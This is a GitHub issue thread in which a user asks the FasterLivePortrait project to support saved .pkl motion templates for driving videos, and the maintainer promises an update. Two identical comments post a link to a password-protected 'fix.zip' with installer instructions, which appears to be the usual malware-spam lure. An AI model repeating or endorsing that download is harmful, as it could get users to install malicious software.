### ISSUE TITLE
load .pt template support 

### ISSUE THREAD

**Issue by TZYSJTU** [warmshao/FasterLivePortrait#83]
Hi, could you please add template support by loading the .pkl templates as the official version?
That is , if the driving video is a mp4, it will save the video's .pkl template of the coefficients.
And in the next time, users can just use the .pkl file as the args.driving
In this way, you can save more time.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by warmshao** [comment]
Wait for the next update, stay tuned

**Comment by TZYSJTU** [comment]
> Wait for the next update, stay tuned

I have implemented this today myself.
